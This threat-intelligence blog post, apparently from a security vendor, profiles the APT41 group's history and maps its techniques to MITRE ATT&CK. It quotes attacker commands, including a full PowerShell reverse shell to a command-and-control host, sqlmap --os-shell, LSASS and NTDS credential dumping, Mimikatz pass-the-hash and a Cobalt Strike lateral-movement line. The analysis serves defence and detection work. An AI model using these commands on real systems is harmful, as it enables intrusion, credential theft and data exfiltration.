.svg)
.svg)
APT41 Cyber Attacks: History, Operations, and Full TTP Analysis
APT41 is a prolific and highly skilled threat actor, active since at least 2007, that distinguishes itself by conducting simultaneous cyber espionage and financially motivated cybercrime operations. This dual-focus, evident since 2014, targets a vast array of sectors, from U.S. state governments to global shipping, logistics, and technology companies. The group is known for its persistence, maintaining long-term unauthorized access for months or even years. A key characteristic of APT41 is its exceptional agility in weaponizing vulnerabilities. Notably, they began exploiting the critical Log4Shell (CVE-2021-44228) vulnerability against at least two U.S. state governments within hours of its public disclosure.
The group's tactics, techniques, and procedures (TTPs) demonstrate a high level of operational sophistication. Their primary initial access vector is the exploitation of public-facing applications, rapidly weaponizing both n-day and zero-day flaws in Citrix, Zoho, Cisco, and other software. Once inside, APT41 masters "living off the land," using a complex, multi-stage delivery process for payloads like Cobalt Strike that relies on built-in Windows utilities like cmd.exe and certutil. They establish persistence through a variety of methods, including creating disguised Windows Services, deploying web shells, and using Scheduled Tasks. For credential access, they are comprehensive, using tools like Mimikatz to dump LSASS memory and built-in utilities like ntdsutil to steal the entire Active Directory database. To evade detection, they employ custom injectors to bypass logging, obfuscate their tools, and exfiltrate stolen data to legitimate cloud services like OneDrive to blend in with normal network traffic.
In this post, we will explore the major historical operations of APT41, highlight their notable campaigns against government and commercial sectors, and examine the group’s tactics, techniques, and procedures to understand how they execute persistent cyber attacks. In the end, we will show how Picus helps defend against this group.
Simulate APT Attacks with 14-Day Free Trial of Picus Platform
What Are the Major Activities of the APT41 Group?
- 2007 – APT41 has been actively operating since at least this year.
- 2014 – Evidence suggests APT41 began conducting simultaneous cybercrime and cyber espionage operations from this time onward [1].
- 2017 – The ShadowPad modular backdoor, which was initially considered exclusive to APT41 (BARIUM) by FireEye, was first identified in the Netsarang compromise [2].
- 20 January 2020 – APT41 began one of its broadest campaigns in recent years, attempting to exploit vulnerabilities in Citrix NetScaler/ADC (CVE-2019-19781), Cisco routers, and Zoho ManageEngine Desktop Central (CVE-2020-10189) at over 75 FireEye customers across more than 20 countries [3].
- 8 March 2020 – APT41 began attempting to exploit the newly disclosed zero-day vulnerability in Zoho ManageEngine Desktop Central (CVE-2020-10189) at more than a dozen FireEye customers, resulting in the compromise of at least five separate victims [3].
- September 2020 – Some members of the APT41 group were indicted by the U.S. Department of Justice (DOJ) for charges including unauthorized access to protected computers, aggravated identity theft, money laundering, and wire fraud [4].
- May 2021 – Mandiant responded to an APT41 intrusion targeting a United States state government computer network, marking the initiation of a persistent, months-long campaign against U.S. state governments [4].
- 10 December 2021 – Within hours of the Apache Foundation releasing an advisory for the critical RCE vulnerability in Log4J (CVE-2021-44228/Log4Shell), APT41 began exploiting it to compromise at least two U.S. state governments [4].
- March 2022 – APT41 breached government networks in six U.S. states, partly by exploiting a vulnerability in a livestock management system.
- Since 2023 – APT41 has infiltrated and maintained prolonged, unauthorized access to numerous victim networks, primarily targeting organizations in the global shipping and logistics, media and entertainment, technology, and automotive sectors across countries including Italy, Spain, Taiwan, Thailand, Turkey, and the United Kingdom [5].
Which MITRE ATT&CK Techniques Are Used by APT41?
Tactic: Reconnaissance
T1595 Active Scanning
The threat actor utilizes various tools for actively scanning target organizations to find vulnerabilities. This includes using vulnerability scanners like Acunetix and network scanners such as Nmap for identifying open ports and services.
|
# Basic Nmap scan with service version detection |
Hidden directories and subdomains are discovered by brute-forcing web directories with utilities including OneForAll, subdomain3, subDomainsBrute, and Sublist3r.
Specialized scanning is also performed. For instance, JexBoss is used to specifically find and exploit vulnerabilities within JBoss application servers [6].
|
# Example: Scanning a host for JBoss vulnerabilities |
Tactic: Initial Access
T1190 Exploit Public-Facing Application
Exploiting public-facing applications is a primary initial access vector for this group, which demonstrates agility in weaponizing both n-day and zero-day vulnerabilities.
A mapping of exploited CVEs includes:
- CVE-2019-19781: Citrix ADC / Gateway
- CVE-2021-44228: Apache Log4j (Log4Shell)
- CVE-2020-10189: Zoho ManageEngine Desktop Central
- CVE-2021-44207: USAHerds Application
- CVE-2019-1653 / CVE-2019-1652: Cisco RV320/RV325 Routers
.NET deserialization attacks are conducted, frequently targeting ASP.NET applications. These attacks use malicious ViewStates created with the YSoSerial.NET tool to achieve code execution.
SQLmap is also launched in various attacks [6]:
|
python sqlmap.py -r [Company1_domain].txt --tamper=space2comment --random-agent -p ctl00%24ContentPlaceHolder1%24txtUserName,ctl00%24ContentPlaceHolder1%24txtPassword --os-shell |
T1566.001 Phishing: Spearphishing Attachment
To gain initial compromise, spearphishing emails with malicious Compiled HTML (.chm) file attachments are used for the surgical targeting of specific individuals.
Tactic: Execution
T1047 Windows Management Instrumentation
Windows Management Instrumentation (WMI) was also leveraged in several malicious campaigns for execution [6].
|
wmic /node:172.19.97.102 /user:{redacted}\{redacted} /password:P$ssw0rd0006 process call create "C:\users\Public\COMSysUpdate.exe"
|
T1053.005 Scheduled Task/Job: Scheduled Task
The Task Scheduler is used to execute malicious files. This technique is applied both to machines where sessions are already established and to new machines identified during reconnaissance [6].
|
SCHTASKS /Create /S 192.168.100.19 /U "{redacted}\administrator" /P "!@#Virg0#@!" /RU SYSTEM /SC DAILY /TN Exec2022 /TR "C:\windows\system32\taskhosts.exe" |
T1059.001 Command and Scripting Interpreter: PowerShell
PowerShell is used to obtain a reverse shell. The code is executed in stealth mode, enabling the compromised device to communicate with a command-and-control server and allowing for remote command execution [6].
|
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('{redacted}', 80);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()" |
T1059.003 Command and Scripting Interpreter: Windows Command Shell
A notably complex, multi-stage process involving the Windows Command Shell (cmd.exe) was employed to deploy the Cobalt Strike Beacon payload [6], ensuring a covert and intact delivery.
- Payload Encoding and Chunking: The Beacon payload was first Base64 encoded and then split into multiple chunks (e.g., 775 or 1,024 characters).
- Staged Writing: These chunks were written one by one into a temporary text file (like C:\dns.txt) using repeated Echo [Base64]{chunk} >> C:\dns.txt commands. In one case, this action was repeated 154 times.
- Decoding via Certutil: The built-in certutil utility, using the --decode parameter, was then used to transform the Base64 file (C:\dns.txt) back into an executable (C:\dns.exe).
- Integrity Check: Certutil was run again, this time with the --hashfile parameter, to verify the executable's hash, confirming a successful and error-free decoding process.
- Final Execution: The resulting executable was then renamed, moved to different directories to hide tracks, and finally launched.
T1218.011 System Binary Proxy Execution: Rundll32
The rundll32.exe binary is used to execute malicious loaders and payloads.
|
# Example generic command |
T1569.002 System Services: Service Execution
Windows services are commonly leveraged as a mechanism for both execution and persistence. Services are created and started to run malicious executables or scripts, like install.bat. This technique was observed in the ColunmTK campaign [6].
|
sc \\<IP> Create SuperIe binPath= "cmd.exe /k "c:\users\public\install.bat" |
Tactic: Persistence
T1505.003 Server Software Component: Web Shell
In one intrusion, a combination of ANTSWORD and BLUEBEAM web shells was deployed for persistence. These web shells were discovered on a Tomcat Apache Manager server and had been active since at least 2023. They were used to execute certutil.exe for downloading the DUSTPAN dropper, which in turn stealthily loaded the BEACON payload [5].
T1543.003 Create or Modify System Process: Windows Service
New Windows services are created to maintain persistence [6].
|
sc \\172.26.16.81 Create SuperIe binPath= "cmd.exe /k c:\users\public\SecurityHealthSystray.exe" |
The DUSTPAN malware was also made persistent through services, with one instance being named "Windows Defend" to avoid detection.
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
In some instances, malicious files were placed in the Startup folder on remote machines. This action ensures the file executes every time the operating system boots [6].
|
copy C:\temp\LxpSvc.exe "\\192.168.100.4\c$\Users\administrator.{redacted}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LxpSvc.exe" |
T1574.001 Hijack Execution Flow: DLL
These techniques were employed to execute the DUSTTRAP malware. DLL side-loading was abused by using a legitimate program, the AhnLab uninstaller, to load the malicious DUSTTRAP payload. Other benign and code-signed Windows binaries were also used for this purpose.
Tactic: Defense Evasion
T1027.002 Obfuscated Files or Information: Software Packing
To remain unnoticed in a victim's network, the threat actors used the well-known protection tool Themida to obfuscate their malicious files.
T1027.013 Obfuscated Files or Information: Encrypted/Encoded File
Encryption is used to hide malicious payloads from security products and analysis. The DUSTTRAP launcher was built to decrypt its payload using AES-128-CFB. Similarly, the DUSTPAN dropper was observed loading BEACON payloads that had been encrypted with ChaCha20.
T1036.005 Match Legitimate Resource Name or Location
Malware is disguised by naming it to match legitimate system files. For example, the DUSTPAN malware was observed being executed with names like w3wp.exe (a common IIS process) and conn.exe to blend in.
T1070.004 Indicator Removal: File Deletion
The group cleans up artifacts to hide its tracks, such as deleting database dumps after exfiltration.
Also when malicious files were no longer required, they were deleted from the host [6].
|
del C:\temp\LxpSvc.exe |
A more advanced variation involves the DUSTTRAP loader: it trojanizes a legitimate DLL in memory but then restores the original, clean file on disk. This is done to evade EDR solutions that perform scans "on file close."
T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification
File and directory permissions are modified, as seen in the following example [6].
|
icacls \\192.168.0.243\c$\www\{redacted}\test2.asp /grant IIS_IUSRS:F |
Tactic: Credential Access
T1003.001 OS Credential Dumping: LSASS Memory
The memory of the Local Security Authority Subsystem Service (LSASS) process is another source of credentials, as it handles user logons and access tokens. The utilities Procdump and Mimikatz are used to dump the memory of this process [6].
|
procdump64.exe -accepteula -ma lsass.exe lsass.dmp |
T1003.002 OS Credential Dumping: Security Account Manager
Account data is also extracted from the Security Account Manager (SAM) database, which stores local account passwords. Attackers attempt to copy this database, either from its registry location (HKLM\SAM\SAM) using the reg save command or by accessing the binary file (%WINDIR%\System32\Config\SAM) via volume shadow copies [6].
|
reg save HKLM\SAM C:\perflogs \sam.save |
T1003.003 OS Credential Dumping: NTDS
The Windows utility Ntdsutil was frequently used in 2021 campaigns. This tool is used to acquire a copy of the ntds.dit file, the Active Directory database, which contains user objects, group information, and password hashes for all domain users [6].
|
ntdsutil "ac i ntds" "ifm" "create full C:\perflogs\temp" q q ntdsutil "activate instance ntds" "ifm" "create full C:\PerfLogs\temp" quit quit |
T1552.001 Unsecured Credentials: Credentials In Files
A search is conducted across files and directories for strings containing keywords like "user" or "password" to find unsecured credentials [6].
|
findstr /c:"User" /c:"Password" /si web.config |
T1555.003 Credentials from Password Stores: Credentials from Web Browsers
A tool called BrowserGhost is used to obtain stored credentials from web browsers [6].
|
BrowserGhost.exe >> iis.txt |
Tactic: Discovery
T1012 Query Registry
The registry is queried to find information such as current RDP port configurations or network settings [6].
|
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber" |
T1016 System Network Configuration Discovery
Network configuration information is obtained by directly querying specific registry keys [6].
|
reg query "HKEY_LOCAL_MACHINE \SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{1f777394-0b42-11e3-80ad-806e6f6e6963}" |
T1018 Remote System Discovery
The Ping command, often within a FOR loop, is used with single echo requests to identify other live devices on the local network [6].
The SETSPN utility is also used to discover which domain devices are running specific services, such as IIS, SQL, and MSSQL [6].
|
ping -n 1 PIST-FILE-SRV |
T1046 Network Service Discovery
The publicly available tool cping is used to identify local computers that are vulnerable to SMB attacks [6].
|
C:\PerfLogs\cping40.exe scan smbvul 10.0.0.1 10.0.10.1 > 10.txt |
T1049 System Network Connections Discovery
The built-in netstat utility is used to identify active network connections [6].
|
netstat -ano |
T1057 Process Discovery
Reconnaissance is conducted on remote devices to determine if specific files, which had been previously downloaded, are currently running.
|
tasklist /pid 1428 /f |
T1069 Permission Groups Discovery
A list of users and computers within specific high-privilege Windows groups is obtained.
|
net group "Domain Admins" /domain |
T1082 System Information Discovery
Basic system configuration information, such as the Windows version and system architecture, is gathered.
|
echo %PROCESSOR_ARCHITECTURE% |
T1087 Account Discovery
The Net utility is used to gather information about domain group memberships and collect lists of administrators.
|
net user /domain > 1.txt |
T1124 System Time Discovery
The domain time is checked, often to synchronize malicious activities or understand logging timestamps.
|
net time /domain |
T1135 Network Share Discovery
Attempts are made to detect available network shares and drives [6].
|
net share |
T1482 Domain Trust Discovery
Domain trust relationships are enumerated.
|
dsquery site |
Tactic: Lateral Movement
T1550.002 Use Alternate Authentication Material: Pass the Hash
The sekurlsa::pth module of Mimikatz is used to perform PtH attacks [6].
|
mimikatz's sekurlsa::pth /user:Administrator /domain:{redacted} /ntlm:{redacted} /run:"%COMSPEC% /c echo 70c64df2976 > \\.\pipe\277bf3" |
T1570 Lateral Tool Transfer
Tools and payloads are transferred to other systems on the network [6].
|
jump psexec64 {redacted} dns windows/beacon_dns/reverse_dns_txt (ns1.colunm.tk:53) on {redacted} via Service Control Manager (\\[redacted]\ADMIN$\c3632b3.exe) |
Tactic: Collection
T1005 Data from Local System
Files are collected from the local system, including from volume shadow copies and the Windows logging system [6].
|
vssadmin list shadows |
T1560.001 Archive Collected Data: Archive via Utility
Data is compressed using an archiving utility before exfiltration, likely to reduce file size and detection. The rar utility was observed being used to archive data downloaded from internal Oracle databases.
A portable archiver (like 7z.exe) is often downloaded to the compromised device, used to archive the target files, and then the archive is exfiltrated [6].
|
7z.exe a syslog.7z Intl |
T1602 Data from Configuration Repository
In one case involving a software developer, access was gained to a private GitHub repository. This repository stored sensitive data, including credentials for remote servers, private certificates, and server lists [6].
|
shell git clone "ssh://jenkins@{redacted}:29418/DevOps/Playbook2" |
Tactic: Command and Control
T1071.001 Application Layer Protocol: Web Protocols
Communication with C&C servers is established using HTTP and HTTPS listeners [6].
|
port proto domains |
T1071.004 Application Layer Protocol: DNS
DNS tunnels are also used as a method to hide C&C communication [6].
|
port proto domains |
T1090.001 Proxy: Internal Proxy
A tool called FRPC is often used to proxy traffic during the attacks [6].
|
frcp.exe -c frcp.ini |
T1105 Ingress Tool Transfer
Cobalt Strike is used to upload files onto compromised devices. In some targeted attacks, these files were uploaded from special directories named specifically for the victim organization [6].
|
upload C:\Users\Administrator\Desktop\cs\dns\COMSysUpdate.ocx |
Tactic: Exfiltration
T1041 Exfiltration Over C2 Channel
During the exfiltration stage, various server configurations, backup data, and user data were accessed and stolen [6].
|
download D:\projects\{redacted}\web.config; |
T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage
Stolen data was exfiltrated to legitimate cloud services, specifically OneDrive, to blend in with normal network traffic. This was accomplished using PINEGROVE, a command-line tool designed to upload files to OneDrive using its API.
How Picus Simulates APT41 Attacks?
We also strongly suggest simulating APT41 Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for APT41:
|
Threat ID |
Threat Name |
Attack Module |
|
27065 |
APT41 Threat Group Campaign Malware Email Threat |
Network Infiltration |
|
25568 |
APT41 Threat Group Campaign Malware Download Threat |
Network Infiltration |
|
72247 |
APT41 Threat Group Campaign |
Windows Endpoint |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
What Are the Aliases of the APT41 Group?
APT41 is also known as: Wicked Panda, Brass Typhoon, BARIUM, Amoeba, BRONZE ATLAS, BRONZE EXPORT, Blackfly, Double Dragon, Earth Baku, G0044, G0096, Grayfly, HOODOO, LEAD, Leopard Typhoon, Red Kelpie, TA415, TG-2633, WICKED PANDA, WICKED SPIDER, Winnti, Pigfish.
Key Takeaways
- APT41 operates with a dual mission of espionage and financially motivated crime, showing long‑term persistence across diverse global sectors.
- The group is highly agile in weaponizing new vulnerabilities, frequently exploiting both n‑day and zero‑day flaws in widely used enterprise software.
- Their operations rely heavily on living off the land techniques, multi‑stage payload delivery, and covert persistence methods to remain undetected.
- APT41 conducts comprehensive credential theft and internal discovery to expand control across networks, often extracting entire authentication databases.
- Defense evasion is achieved through obfuscation, file manipulation, service masquerading, and stealthy data exfiltration to legitimate cloud services.
- The group uses both web‑based and DNS‑based command and control channels, along with proxies and encrypted payloads, to maintain resilient communication paths.
- Since 2023, APT41 has continued sustained intrusions in critical industries worldwide, demonstrating consistent operational maturity.
References
[1] “APT41 Chinese Cyber Threat Group,” Google Cloud Blog. Accessed: Nov. 11, 2025. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/apt41-dual-espionage-and-cyber-crime-operation
[2] Accessed: Nov. 11, 2025. [Online]. Available: https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf
[3] “APT41 Initiates Intrusion Campaign Using Multiple Exploits,” Google Cloud Blog. Accessed: Nov. 11, 2025. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/apt41-initiates-global-intrusion-campaign-using-multiple-exploits/
[4] “APT41 Targeting U.S. State Government Networks,” Google Cloud Blog. Accessed: Nov. 11, 2025. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/apt41-us-state-governments
[5] “APT41 Has Arisen From the DUST,” Google Cloud Blog. Accessed: Nov. 11, 2025. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust
[6] N. R. A. Head-ASM, TI, and DRP, “APT41 World Tour 2021 on a tight schedule,” Group-IB. Accessed: Nov. 14, 2025. [Online]. Available: https://www.group-ib.com/blog/apt41-world-tour-2021/
